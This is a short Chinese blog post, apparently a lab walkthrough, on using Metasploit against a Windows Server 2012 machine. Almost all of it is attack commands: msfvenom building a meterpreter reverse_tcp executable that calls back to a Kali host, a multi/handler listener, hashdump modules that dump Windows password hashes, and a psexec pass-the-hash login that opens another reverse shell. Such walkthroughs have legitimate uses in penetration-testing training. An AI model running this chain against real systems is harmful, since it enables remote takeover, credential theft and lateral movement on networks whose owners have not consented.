利用msf抓取密码,并用hash登录

2019-12-13  本文已影响0人  BuFFERer

kali : 192.168.3.136

windows server 2012 : 192.168.3.129

1、生成一个exe远控

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.136 LPORT=12345 -f exe > /root/test.exe

2、反弹到kali

启动msf

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.3.136

set lport 12345

run

3、抓取windows密码

run post/windows/gather/hashdump

run post/windows/gather/smart_hashdump

4、使用hash进行登录

use exploit/windows/smb/psexec

设置ip,账号,hash

set rhosts 192.168.3.129

set SMBuser 用户名

set SMBPass hash

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.3.136

set lport 1111

反弹成功

上一篇下一篇

猜你喜欢

热点阅读